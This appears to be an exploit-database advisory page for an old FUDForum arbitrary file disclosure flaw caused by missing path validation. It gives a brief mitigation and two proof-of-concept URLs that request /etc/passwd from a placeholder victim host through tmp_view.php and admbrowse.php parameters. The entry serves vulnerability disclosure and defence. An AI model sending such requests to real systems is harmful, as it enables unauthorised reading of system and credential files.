header-logo
Suggest Exploit
vendor:
FUDForum
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary File Disclosure
434
CWE
Product Name: FUDForum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

FUDForum Arbitrary File Disclosure Vulnerability

FUDForum is vulnerable to arbitrary file disclosure due to a lack of path validation. An attacker can make malicious requests via URI parameters to access sensitive files.

Mitigation:

Ensure that FUDForum is up to date and that all path validation is properly implemented.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5501/info

Reportedly, FUDForum may disclose contents of arbitrary files to attackers. The vulnerability is the result of FUDForum failing to check the path of the file that is being requested. By simply making malicious requests via URI parameters, an attacker is able to obtain access to potentially sensitive files.

http://victimhost.com/tmp_view.php?file=/etc/passwd
http://victimhost.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]

Navigation

Suggest Exploit

Services By CQR